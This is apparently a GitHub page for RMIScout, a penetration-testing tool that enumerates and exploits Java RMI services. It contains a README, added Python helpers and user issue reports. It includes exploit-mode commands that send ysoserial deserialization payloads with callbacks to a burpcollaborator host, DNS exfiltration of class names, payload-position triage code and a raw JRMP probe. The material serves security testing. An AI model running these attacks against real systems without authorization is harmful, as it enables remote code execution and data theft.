bishopfox / rmiscout

RMIScout uses wordlist and bruteforce strategies to enumerate Java RMI functions and exploit RMI parameter unmarshalling vulnerabilities

Home Page: https://labs.bishopfox.com/tech-blog/rmiscout

License: MIT License

Java 99.64% Shell 0.21% Dockerfile 0.15%
java java-rmi java-deserialization security-tools offensive-security javassist scanner

rmiscout's Introduction


Description

RMIScout enables wordlist and bruteforce attacks against exposed Java RMI interfaces to safely guess method signatures without invocation. It supports multiple Java RMI protocols, method invocation, and exploitation.

Feature overview

  • Supports multiple types of Java RMI servers: RMI-JRMP, RMI-SSL, RMI-IIOP (CORBA), and Activation servers
  • Multiple modes of operation
    • wordlist mode: Test for remote methods using a wordlist of signatures (see included lists/prototypes.txt)
    • bruteforce mode: Given a wordlist of method names, generate candidate signatures from combinations of parameter types, parameter counts, and return types.
    • exploit mode: Use ysoserial to exploit remote methods with non-primitive parameters.
      • Requires rmiscout to be run with JRE 1.8 for ysoserial to work properly.
    • probe mode: Use GadgetProbe to identify classes in the remote classpath
    • invoke mode: Directly invoke remote methods by specifying a method signature and parameter values from the command line (primitives, arrays, and Strings only).
    • list mode: List available registries on remote server.
  • Automatically switches between RMI, RMI-SSL, Activation stubs.
  • Automatically performs localhost bypass techniques (e.g., remote objects whose stubs advertise an endpoint of @127.0.0.1:XXXX but which are still reachable externally on port XXXX)

How it works

To identify RMI methods without executing them, RMIScout uses low-level RMI network functions and dynamic class generation to send RMI invocations with deliberately mismatched types that trigger remote exceptions. Every parameter is replaced with an instance of a dynamically generated serializable class whose 255-character name is assumed not to exist on the remote classpath. For example:

Remote Interface:

void login(String user, String password)

RMIScout will invoke:

login((String) new QQkzkn3..255 chars..(), (String) new QQkzkn3..255 chars..())

If the method exists, the server accepts the call and then fails while unmarshalling the arguments: the remote JVM cannot load the bogus class, so the client receives a java.rmi.UnmarshalException caused by a ClassNotFoundException (or a similar argument unmarshalling error) and the underlying method body is never invoked. If the method does not exist, the server rejects the call before reading any arguments, so the two outcomes are distinguishable.

For a more detailed technical writeup, see the Bishop Fox blog post at https://labs.bishopfox.com/tech-blog/rmiscout.

Modes of operation

Wordlist mode

./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>

Supply a wordlist of method prototypes to check for on the remote server. RMIScout will output all identified matches.

For RMI-IIOP/CORBA: unless methods are overloaded, bruteforcing and invocation only require the method name to match; all other signature information is ignored.

Bruteforce mode

./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

Supply a wordlist of candidate method names, then provide a comma-delimited list of candidate return types, number range of parameters, and candidate parameter types. Bruteforce mode will generate the permutations and look for matching signatures.
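Added example (this is not RMIScout's own code): the JRMP wire protocol identifies a remote method by a 64-bit hash of its name and JVM method descriptor, which is why a wordlist entry must match parameter and return types exactly while the dummy parameter names are irrelevant, and why bruteforce mode has to enumerate type combinations rather than names alone. The Python below turns prototypes written in the wordlist grammar into descriptors and hashes (the hash follows sun.rmi.server.Util.computeMethodHash: SHA-1 over the DataOutput.writeUTF encoding of name plus descriptor, first eight digest bytes read little-endian as a signed long) and enumerates bruteforce candidates for a name list, return types, parameter types and arity range. Assumptions made here: the shorthand String stands for java.lang.String, an Interface.method prefix is stripped, and bruteforce mode is modelled as the full Cartesian product (30 candidates per name and return type for -p String,int -l 1,4, which is consistent with the permutation counts quoted in the issues on this page).

```python
import hashlib
import itertools
import struct

# JVM descriptors for primitive and void types; every other type is an object type.
PRIMITIVES = {
    "void": "V", "boolean": "Z", "byte": "B", "char": "C", "short": "S",
    "int": "I", "long": "J", "float": "F", "double": "D",
}
# Assumption: unqualified shorthand accepted in wordlists and on the command line.
SHORTHAND = {"String": "java.lang.String", "Object": "java.lang.Object"}


def type_descriptor(java_type):
    """'int' -> 'I', 'java.lang.String' -> 'Ljava/lang/String;', 'float[]' -> '[F'."""
    java_type = java_type.strip()
    dims = 0
    while java_type.endswith("[]"):
        java_type = java_type[:-2].strip()
        dims += 1
    java_type = SHORTHAND.get(java_type, java_type)
    base = PRIMITIVES.get(java_type) or "L" + java_type.replace(".", "/") + ";"
    return "[" * dims + base


def parse_prototype(proto):
    """'void login(java.lang.String a, java.lang.String b)'
    -> ('void', 'login', ['java.lang.String', 'java.lang.String']).
    Dummy parameter names are optional and ignored; an 'Iface.method' prefix is
    stripped (assumption about the wordlist grammar)."""
    head, _, rest = proto.strip().partition("(")
    ret_type, name = head.split()[-2:]
    name = name.rsplit(".", 1)[-1]
    params = []
    for param in rest[: rest.rindex(")")].split(","):
        tokens = param.split()
        if tokens:  # 'java.lang.String a' -> keep the type, drop the trailing dummy name
            params.append(tokens[0] if len(tokens) == 1 else " ".join(tokens[:-1]))
    return ret_type, name, params


def method_descriptor(proto):
    """Name plus JVM descriptor, e.g. 'login(Ljava/lang/String;Ljava/lang/String;)V'."""
    ret_type, name, params = parse_prototype(proto)
    return name + "(" + "".join(map(type_descriptor, params)) + ")" + type_descriptor(ret_type)


def method_hash(proto):
    """64-bit JRMP method hash as computed by sun.rmi.server.Util.computeMethodHash:
    SHA-1 over writeUTF(name + descriptor) (two-byte big-endian length, then the
    bytes), first eight digest bytes interpreted little-endian as a signed Java long."""
    s = method_descriptor(proto).encode("utf-8")
    digest = hashlib.sha1(struct.pack(">H", len(s)) + s).digest()
    return struct.unpack("<q", digest[:8])[0]


def bruteforce_prototypes(names, return_types, param_types, min_params, max_params):
    """Candidate prototypes for bruteforce mode, modelled (assumption) as the Cartesian
    product of method name x return type x ordered parameter types for each arity."""
    for name in names:
        for ret in return_types:
            for arity in range(min_params, max_params + 1):
                for combo in itertools.product(param_types, repeat=arity):
                    args = ", ".join("%s p%d" % (t, i) for i, t in enumerate(combo))
                    yield "%s %s(%s)" % (ret, name, args)


if __name__ == "__main__":
    # Constructed wordlist entries, in the same grammar as lists/prototypes.txt.
    for proto in ["void login(java.lang.String user, java.lang.String password)",
                  "void login(String a, String b)",  # same hash: names and shorthand do not matter
                  "int addList(int[] a)"]:
        print("%-60s %-45s %d" % (proto, method_descriptor(proto), method_hash(proto)))
    candidates = list(bruteforce_prototypes(["add"], ["void", "boolean", "long"], ["String", "int"], 1, 4))
    print(len(candidates), "candidates for one name, e.g.", candidates[0])  # 90 candidates
```

Because the server matches on the hash before it reads any argument, a prototype with the wrong return type is as much a miss as one with the wrong method name; when a wordlist hit is expected but absent, widening the return types in bruteforce mode is usually the first thing to try.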

Exploit mode

./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' -p ysoserial.payloads.URLDNS -c "http://examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

On misconfigured servers, any known RMI signature that takes a non-primitive type (e.g., java.util.List) can be exploited by replacing that object with a serialized payload. This is a fairly common misconfiguration (e.g., VMware vSphere Data Protection + vRealize Operations Manager, Pivotal tc Server and GemFire, Apache Karaf + Cassandra), as highlighted in An Trinh's 2019 Black Hat EU talk.

RMIScout integrates with ysoserial to perform deserialization attacks against services that have not configured, or have incorrectly configured, a process-wide deserialization filter (JEP 290).

Examples of exploitable signatures:

void exampleMethod(java.util.Map a) // Any non-primitive types
void exampleMethod(float[] a) // Any type of array, even primitives
void exampleMethod(String a) // Works on older JDKs, see below...

Note: Signatures whose only non-primitive parameters are java.lang.String are exploitable over RMI-JRMP only on JRE 8/11/13/14 releases prior to early 2020, but remain exploitable over RMI-IIOP.
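Added example (not part of RMIScout): a triage pass over signatures that wordlist or bruteforce mode has confirmed, applying the rules above to flag which parameter positions can carry a ysoserial payload. The two conditions the java.lang.String note depends on, the transport and whether the target runs a pre-2020 JRE, are the function's inputs; the list of confirmed signatures is constructed for the example.

```python
PRIMITIVES = {"boolean", "byte", "char", "short", "int", "long", "float", "double"}
STRING_TYPES = {"String", "java.lang.String"}


def parameter_types(signature):
    """'void m(java.util.Map a, int b)' -> ['java.util.Map', 'int'] (dummy names optional)."""
    inner = signature[signature.index("(") + 1 : signature.rindex(")")]
    types = []
    for param in inner.split(","):
        tokens = param.split()
        if tokens:
            types.append(tokens[0] if len(tokens) == 1 else " ".join(tokens[:-1]))
    return types


def exploitable_params(signature, protocol="jrmp", legacy_jre=False):
    """Return [(index, type, reason)] for every parameter that the server unmarshals as
    an object, i.e. where a serialized gadget chain can be substituted:
      - arrays, including primitive arrays, are always object-typed on the wire
      - any non-primitive class (java.util.Map, com.example.Dto, boxed types) qualifies
      - java.lang.String qualifies over RMI-IIOP, and over JRMP only on JREs from
        before the early-2020 fixes (legacy_jre=True)
      - bare primitives are read with readInt()/readLong()/... and never qualify"""
    hits = []
    for index, java_type in enumerate(parameter_types(signature)):
        bare = java_type.replace(" ", "")
        if bare.endswith("[]"):
            hits.append((index, java_type, "array type"))
        elif bare in PRIMITIVES:
            continue
        elif bare in STRING_TYPES:
            if protocol == "iiop":
                hits.append((index, java_type, "String over RMI-IIOP"))
            elif legacy_jre:
                hits.append((index, java_type, "String over JRMP on a pre-2020 JRE"))
        else:
            hits.append((index, java_type, "non-primitive object"))
    return hits


def triage(signatures, protocol="jrmp", legacy_jre=False):
    """Map each confirmed signature to its exploitable parameters; an empty list means
    the method offers nowhere to place a payload under the given conditions."""
    return {s: exploitable_params(s, protocol, legacy_jre) for s in signatures}


if __name__ == "__main__":
    # Constructed list of signatures, as wordlist mode might confirm them.
    found = [
        "void exampleMethod(java.util.Map a)",
        "void exampleMethod(float[] a)",
        "void exampleMethod(String a)",
        "void vulnSignature(java.lang.String a, int b)",
        "int add(int a, int b)",
    ]
    for protocol, legacy in [("jrmp", False), ("jrmp", True), ("iiop", False)]:
        print("== %s, legacy JRE=%s" % (protocol, legacy))
        for sig, hits in triage(found, protocol, legacy).items():
            print("  %-48s %s" % (sig, hits or "no payload position"))
```

The index in each hit is the parameter position to hand to exploit mode; when several positions qualify, prefer a non-String object parameter, since that one does not depend on the JRE age of the target.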

Invoke mode

./rmiscout.sh invoke -p 1 -p 4 -s 'int add(int a, int b)' <host> <port>
./rmiscout.sh invoke -p 1,2,3,4 -s 'int addList(int[] a)' <host> <port>

RMIScout lets you invoke any signature whose parameters are primitives, primitive arrays, or Strings. More advanced types require writing a custom client.

Probe mode

./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ../GadgetProbe/wordlists/maven_popular.list -d "examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

RMIScout integrates with GadgetProbe to identify classes in the remote classpath. Class names are exfiltrated via DNS.

Building and Running

Use the included rmiscout.sh script to automatically build the project and as a convenient wrapper around java -jar syntax:

./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>

Alternatively, build the project manually and use traditional java -jar syntax:

# Manually build JAR
./gradlew shadowJar

java -jar build/libs/rmiscout-1.4-SNAPSHOT-all.jar wordlist -i lists/prototypes.txt <host> <port>

Note: RMI-IIOP (compile/runtime) and ysoserial (runtime) depend on JDK8.

Try It out

Run the dockerized demo RMI server. Try out the included demo/wordlist.txt.

cd demo
./start_demo.sh

Troubleshooting

Q: How can I tell if <host>:<port> is an RMI Registry?

Use ./rmiscout.sh list <host> <port> to get information about registries on a remote server.

[INFO] Registries available on 127.0.0.1:1099 = [ActivationServer:com.bishopfox.example.ActivationImpl_Stub, plaintest:com.bishopfox.example.HelloInterface]

Or, use nmap's rmi-dumpregistry script:

nmap --script rmi-dumpregistry 172.17.0.1 -p 1099 -Pn

PORT     STATE SERVICE
1099/tcp open  rmiregistry
| rmi-dumpregistry:
|   ActivationServer
|     com.bishopfox.example.ActivationImpl_Stub
|     \x00\x0EActivatableRef
|     extends
|       java.rmi.server.RemoteStub
|       extends
|         java.rmi.server.RemoteObject
|   plaintest
|      implements com.bishopfox.example.HelloInterface,
|     extends
|       java.lang.reflect.Proxy
|       fields
|           Ljava/lang/reflect/InvocationHandler; h
|             java.rmi.server.RemoteObjectInvocationHandler
|             @127.0.0.1:1111
|             extends
|_              java.rmi.server.RemoteObject
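Added example (not part of RMIScout or nmap): the same check done by hand with the JRMP handshake, for when neither tool is at hand or a non-standard port needs confirming. An RMI client opens with the magic JRMI, protocol version 2 and the StreamProtocol selector; a JRMP endpoint answers with ProtocolAck followed by the client's own address and port as writeUTF/writeInt, after which the client sends its endpoint and may issue calls. Anything else (an HTTP banner, a TLS alert, a ProtocolNack) means the port is not plaintext JRMP; an RMI-SSL listener fails this probe because the TLS handshake has to come first. The constants are those of sun.rmi.transport.TransportConstants; the Registry.list() call uses the fixed registry ObjID, opnum 1 and the Registry interface hash. The sample ack bytes are constructed; probe_registry does the live exchange and is not run offline.

```python
import socket
import struct

# JRMP wire constants (sun.rmi.transport.TransportConstants).
JRMI_MAGIC = b"JRMI"      # 0x4a524d49
JRMI_VERSION = 2
STREAM_PROTOCOL = 0x4B
PROTOCOL_ACK = 0x4E
PROTOCOL_NACK = 0x4F
CALL = 0x50
RETURN = 0x51

# Registry interface hash and the opnum of list() in the 1.1-style registry skeleton.
REGISTRY_INTERFACE_HASH = 4905912898345647071
REGISTRY_OP_LIST = 1


def client_hello():
    """First bytes an RMI client sends: magic, version, stream-protocol selector."""
    return JRMI_MAGIC + struct.pack(">HB", JRMI_VERSION, STREAM_PROTOCOL)


def parse_protocol_ack(data):
    """Parse the server reply: ProtocolAck, then writeUTF(client host) + writeInt(client port).
    Returns (host, port) or raises ValueError if the peer did not speak JRMP."""
    if not data or data[0] != PROTOCOL_ACK:
        raise ValueError("not a JRMP ProtocolAck (got %r)" % data[:1])
    if len(data) < 3:
        raise ValueError("truncated ack")
    (hlen,) = struct.unpack(">H", data[1:3])
    if len(data) < 3 + hlen + 4:
        raise ValueError("truncated ack")
    host = data[3:3 + hlen].decode("utf-8")
    (port,) = struct.unpack(">i", data[3 + hlen:7 + hlen])
    return host, port


def client_endpoint(host="127.0.0.1", port=0):
    """The client's reply to the ack: its own endpoint as writeUTF(host) + writeInt(port)."""
    h = host.encode("utf-8")
    return struct.pack(">H", len(h)) + h + struct.pack(">i", port)


def registry_list_call():
    """Call message for Registry.list(): the Call byte, then a Java serialization stream
    whose block data carries ObjID(0) for the registry, opnum 1 and the interface hash."""
    objid = struct.pack(">qiqh", 0, 0, 0, 0)   # objNum + UID(unique, time, count) = 22 bytes
    body = objid + struct.pack(">iq", REGISTRY_OP_LIST, REGISTRY_INTERFACE_HASH)
    stream = b"\xac\xed\x00\x05" + b"\x77" + bytes([len(body)]) + body  # STREAM_MAGIC, TC_BLOCKDATA
    return bytes([CALL]) + stream


def probe_registry(host, port, timeout=5.0):
    """Live check (needs a target; not run offline): handshake, then list().
    Returns (client host as seen by server, port as seen by server, got_return, raw reply)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(client_hello())
        seen_host, seen_port = parse_protocol_ack(s.recv(512))
        s.sendall(client_endpoint())
        s.sendall(registry_list_call())
        reply = s.recv(4096)
        return seen_host, seen_port, reply[:1] == bytes([RETURN]), reply


if __name__ == "__main__":
    print("hello:", client_hello().hex())
    # Constructed ack: ProtocolAck, "10.0.0.5", port 54321 as the server saw us.
    print("ack:", parse_protocol_ack(b"\x4e\x00\x0810.0.0.5\x00\x00\xd4\x31"))
    print("list call:", registry_list_call().hex())
```

A Return reply whose serialized String[] lists names is the equivalent of the rmiscout list output above; a reply that starts with the Return byte but carries an exception still proves the port speaks JRMP, which is the point of the check.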

Q: I found a registry on port 1098 with the name java.rmi.activation.ActivationSystem. What can I do with it?

This is an rmid Activation System Daemon. All of its methods are restricted by the SecurityManager. More recent JREs check if the remote peer originates from localhost before deserializing any remote data. Older (pre 2011) versions did not have this check and may be vulnerable. See https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb

Q: Can I run RMIScout with a newer runtime than JRE 8?

A: Technically yes, but several features stop working: CORBA (RMI-IIOP) support, probe mode, and ysoserial (exploit mode) all require JRE 8.

Q: Why am I getting a CannotCompileException?

A: A CannotCompileException occurs when an invalid method name or prototype is supplied directly or via a wordlist. RMIScout generates bytecode for user-supplied candidate signatures at runtime. Although RMIScout has basic rules for correcting common syntax errors in user-supplied prototypes, it will sometimes fail.

Author

Twitter: @BumbleSec

GitHub: the-bumble

rmiscout's People

Contributors

the-bumble, wdahlenburg

rmiscout's Issues

javax.net.ssl.SSLException: Unsupported or unrecognized SSL message

Hello,

I've identified a running RMI instance on a host; however, when I try to run rmiscout against the host I receive the following message:

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
java.lang.ClassNotFoundException: com.sun.corba.se.spi.logging.LogWrapperBase
        at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
        at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
        at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
        at java.base/java.lang.Class.forName0(Native Method)
        at java.base/java.lang.Class.forName(Class.java:315)
        at com.bishopfox.rmiscout.RMIScout.disableAccessWarnings(RMIScout.java:75)
        at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:170)
[INFO] No registry specified. Attempting operation on all available registries...
[ERROR] error during JRMP connection establishment; nested exception is: 
        javax.net.ssl.SSLException: Unsupported or unrecognized SSL message                                       
Might be RMI-IIOP (--iiop) or server might use non-standard protocol.     

Is there a way to bypass or ignore SSL errors when connecting? I tried re-running with --activation server which provided the same message.

The command I'm running is:

java -jar rmiscout-1.4-SNAPSHOT-all.jar wordlist -i prototypes.txt x.x.x.x rmi_port# 

Dockerfile does not work

Description of Bug

The Docker build operation does not work as expected.

What should the expected behavior be

Docker build successful.

Platform Affected

N/A

Steps to Reproduce

docker build . -t rmiscout
Sending build context to Docker daemon  13.04MB
Step 1/6 : FROM openjdk:8
8: Pulling from library/openjdk
df5590a8898b: Pull complete 
705bb4cb554e: Pull complete 
519df5fceacd: Pull complete 
ccc287cbeddc: Pull complete 
39a2961e8351: Pull complete 
a12df774715e: Pull complete 
08f28107b8b3: Pull complete 
Digest: sha256:29790ba47d15339629a8e6c2ae971b5ec417e2b99b24a4f2506d29439bd5bcb4
Status: Downloaded newer image for openjdk:8
 ---> c6a23ae24020
Step 2/6 : COPY . /rmiscout
 ---> 5713a7b8f3d9
Step 3/6 : WORKDIR /rmiscout
 ---> Running in ee04b6a6efa3
Removing intermediate container ee04b6a6efa3
 ---> 6c98d19414ac
Step 4/6 : RUN ./gradlew shadowJar
 ---> Running in 6d720f86e604
Downloading https://services.gradle.org/distributions/gradle-4.10.3-bin.zip
..........................................................................

Welcome to Gradle 4.10.3!

Here are the highlights of this release:
 - Incremental Java compilation by default
 - Periodic Gradle caches cleanup
 - Gradle Kotlin DSL 1.0-RC6
 - Nested included builds
 - SNAPSHOT plugin versions in the `plugins {}` block

For more details see https://docs.gradle.org/4.10.3/release-notes.html

Starting a Gradle Daemon (subsequent builds will be faster)
> Task :compileJava FAILED

FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':compileJava'.
> A problem occurred starting process 'command '/usr/lib/jvm/jdk1.8.0_301/bin/javac''

* Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

* Get more help at https://help.gradle.org

Deprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.
Use '--warning-mode all' to show the individual deprecation warnings.
See https://docs.gradle.org/4.10.3/userguide/command_line_interface.html#sec:command_line_warnings

BUILD FAILED in 34s
1 actionable task: 1 executed
The command '/bin/sh -c ./gradlew shadowJar' returned a non-zero code: 1

javassist.CannotCompileException

I'm getting the following error when trying to run the wordlist against a remote host.

# ./rmiscout.sh wordlist -i lists/prototypes.txt x.x.x.x xxxxx
javassist.CannotCompileException: by java.lang.SecurityException: Prohibited package name: java.rmi.activation
        at javassist.ClassPool.toClass(ClassPool.java:1120)
        at javassist.ClassPool.toClass(ClassPool.java:1063)
        at javassist.CtClass.toClass(CtClass.java:1315)
        at com.bishopfox.rmiscout.RMIConnector.generateStubs(RMIConnector.java:120)
        at com.bishopfox.rmiscout.RMIConnector.<init>(RMIConnector.java:80)
        at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:193)
        at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:131)
Caused by: java.lang.SecurityException: Prohibited package name: java.rmi.activation
        at java.lang.ClassLoader.preDefineClass(ClassLoader.java:655)
        at java.lang.ClassLoader.defineClass(ClassLoader.java:754)
        at java.lang.ClassLoader.defineClass(ClassLoader.java:635)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at javassist.ClassPool.toClass2(ClassPool.java:1133)
        at javassist.ClassPool.toClass(ClassPool.java:1114)
        ... 6 more

I'm running the following Java version:

# java -version
openjdk version "1.8.0_252"
OpenJDK Runtime Environment (build 1.8.0_252-8u252-b09-1~deb9u1-b09)
OpenJDK 64-Bit Server VM (build 25.252-b09, mixed mode)

Error in openjdk version "11.0.7-ea" 2020-04-14

kali@kali:/opt/rmiscout$ ./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 [ip] [port]
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Generating Permutations for [void] type...
Finished generating and querying 1110 Permutations

[ERROR] Did you forget to remove the interface name from the method name?

Full Stacktrace:

javassist.CannotCompileException: by java.lang.ClassFormatError: Illegal class name "" in class file
at javassist.ClassPool.toClass(ClassPool.java:1120)
at javassist.ClassPool.toClass(ClassPool.java:1063)
at javassist.CtClass.toClass(CtClass.java:1315)
at com.bishopfox.rmiscout.RMIConnector.generateStubs(RMIConnector.java:213)
at com.bishopfox.rmiscout.RMIConnector.<init>(RMIConnector.java:124)
at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:198)
at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:158)
Caused by: java.lang.ClassFormatError: Illegal class name "" in class file
at java.base/java.lang.ClassLoader.defineClass1(Native Method)
at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1017)
at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:878)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:566)
at javassist.ClassPool.toClass2(ClassPool.java:1133)
at javassist.ClassPool.toClass(ClassPool.java:1114)
... 6 more

kali@kali:/opt/rmiscout$ java -version
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
openjdk version "11.0.7-ea" 2020-04-14
OpenJDK Runtime Environment (build 11.0.7-ea+9-post-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.7-ea+9-post-Debian-1, mixed mode, sharing)

[ERROR] Dummy parameter names are required for method signature (e.g., -s 'boolean login(java.lang.String a, java.lang.String b)')

New version throw an Exception:

kali@kali:~/tools/rmiscout$ ./rmiscout.sh wordlist -i lists/prototypes.txt 127.0.0.1 1099
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[INFO] Adding missing dummy parameter names to signature
[INFO] Auto-corrected signature: java.lang.Boolean[] wrapperBooleanArrayTest(java.lang.Boolean[] v a)

[ERROR] Dummy parameter names are required for method signature (e.g., -s 'boolean login(java.lang.String a, java.lang.String b)')

Full Stacktrace:

javassist.CannotCompileException: [source error] syntax error near "ean[] v a) throws ja"
at javassist.CtNewMethod.make(CtNewMethod.java:79)
at javassist.CtNewMethod.make(CtNewMethod.java:45)
at com.bishopfox.rmiscout.RMIConnector.generateStubs(RMIConnector.java:197)
at com.bishopfox.rmiscout.RMIConnector.<init>(RMIConnector.java:124)
at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:198)
at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:136)
Caused by: compile error: syntax error near "ean[] v a) throws ja"
at javassist.compiler.Parser.parseFormalParam(Parser.java:210)
at javassist.compiler.Parser.parseMethod1(Parser.java:114)
at javassist.compiler.Parser.parseMember1(Parser.java:65)
at javassist.compiler.Javac.compile(Javac.java:90)
at javassist.CtNewMethod.make(CtNewMethod.java:74)
... 5 more

RMI services generated by Spring Framework's RmiInvocationHandler?

While testing RMI services generated by Spring Framework's RmiInvocationHandler, rmiscout complains about signatures not matching even when using signatures copied straight from the Interface definition in the decompiled server component jar.

It appears like Spring wraps the service methods and therefore changes the signature, but I don't know in what way yet. Have you had any experience with any such services?

Detect Objects Exposed via javax.rmi.ssl.SslRMIClientSocketFactory

Eh up! Nice work, love a bit of RMI hackery! I had a chance to test this out on a client engagement recently and hit a gotcha that might be worth handling and documenting.

Essentially an RMI service can associate a socket factory with a bound object reference. Method invocations against the returned object reference will use the socket factory class requested by the server (see https://docs.oracle.com/javase/8/docs/technotes/guides/rmi/socketfactory/index.html#usingCustomSocketFactory) to create a socket for the connection and method invocation. In this case javax.rmi.ssl.SslRMIClientSocketFactory was used along with a self-signed certificate. This resulted in a java.rmi.ConnectIOException being thrown here https://github.com/BishopFox/rmiscout/blob/master/src/main/java/com/bishopfox/rmiscout/RMIConnector.java#L313. The full stack trace is included below for reference.

It seems to be a PitA to get Java to accept self-signed certs but the solution I came up with was:

  1. Capture the network traffic from rmiscout to identify the message from the server containing the TLS certificate
  2. Save the certificate to a file (in my case with Wireshark, select the Certificate: xxxx row in the packet details pane, right-click and select Export Packet Bytes)
  3. Import the certificate into the Java keystore (on Ubuntu 18 I did this with keytool -import -keystore /etc/ssl/certs/java/cacerts -storepass changeit -file cert.crt)

After importing the certificate, rmiscout was able to attempt method invocations on the object. Sadly no luck this time :(

You can probably hack something together to handle this cleanly (i.e. possibly altering the socket factory, not sure if proxying, similar to what I do with BaRMIe, would be required), but it's probably worth at least catching the exception and bailing out so rmiscout doesn't attempt 100s or 1000s of connections to a service it can't speak to.

java.rmi.ConnectIOException: error during JRMP connection establishment; nested exception is: 
	javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
	at sun.rmi.transport.tcp.TCPChannel.createConnection(TCPChannel.java:307)
	at sun.rmi.transport.tcp.TCPChannel.newConnection(TCPChannel.java:202)
	at sun.rmi.server.UnicastRef.invoke(UnicastRef.java:132)
	at com.bishopfox.rmiscout.RMIConnector.execute(RMIConnector.java:313)
	at com.bishopfox.rmiscout.RMIConnector.checkIfPresent(RMIConnector.java:241)
	at com.bishopfox.rmiscout.RMIScout.process(RMIScout.java:197)
	at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:134)
Caused by: javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
	at sun.security.ssl.Alerts.getSSLException(Alerts.java:198)
	at sun.security.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1967)
	at sun.security.ssl.Handshaker.fatalSE(Handshaker.java:331)
	at sun.security.ssl.Handshaker.fatalSE(Handshaker.java:325)
	at sun.security.ssl.ClientHandshaker.serverCertificate(ClientHandshaker.java:1688)
	at sun.security.ssl.ClientHandshaker.processMessage(ClientHandshaker.java:226)
	at sun.security.ssl.Handshaker.processLoop(Handshaker.java:1082)
	at sun.security.ssl.Handshaker.process_record(Handshaker.java:1010)
	at sun.security.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:1079)
	at sun.security.ssl.SSLSocketImpl.performInitialHandshake(SSLSocketImpl.java:1388)
	at sun.security.ssl.SSLSocketImpl.writeRecord(SSLSocketImpl.java:765)
	at sun.security.ssl.AppOutputStream.write(AppOutputStream.java:123)
	at java.io.BufferedOutputStream.flushBuffer(BufferedOutputStream.java:82)
	at java.io.BufferedOutputStream.flush(BufferedOutputStream.java:140)
	at java.io.DataOutputStream.flush(DataOutputStream.java:123)
	at sun.rmi.transport.tcp.TCPChannel.createConnection(TCPChannel.java:229)
	... 6 more
Caused by: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
	at sun.security.validator.PKIXValidator.doBuild(PKIXValidator.java:450)
	at sun.security.validator.PKIXValidator.engineValidate(PKIXValidator.java:317)
	at sun.security.validator.Validator.validate(Validator.java:262)
	at sun.security.ssl.X509TrustManagerImpl.validate(X509TrustManagerImpl.java:330)
	at sun.security.ssl.X509TrustManagerImpl.checkTrusted(X509TrustManagerImpl.java:237)
	at sun.security.ssl.X509TrustManagerImpl.checkServerTrusted(X509TrustManagerImpl.java:132)
	at sun.security.ssl.ClientHandshaker.serverCertificate(ClientHandshaker.java:1670)
	... 17 more
Caused by: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
	at sun.security.provider.certpath.SunCertPathBuilder.build(SunCertPathBuilder.java:141)
	at sun.security.provider.certpath.SunCertPathBuilder.engineBuild(SunCertPathBuilder.java:126)
	at java.security.cert.CertPathBuilder.build(CertPathBuilder.java:280)
	at sun.security.validator.PKIXValidator.doBuild(PKIXValidator.java:445)
	... 23 more

Build the project manually

1. # export JAVA_TOOL_OPTIONS="-Dhttps.protocols=TLSv1.2" <-- to fix the HTTPS issues
2. rmiscout# ./gradlew shadowJar <-- to be checked the following errors
Picked up JAVA_TOOL_OPTIONS: -Dhttps.protocols=TLSv1.2

FAILURE: Build failed with an exception.

  • Where:
    Build file '/root/rmiscout/build.gradle' line: 4

  • What went wrong:
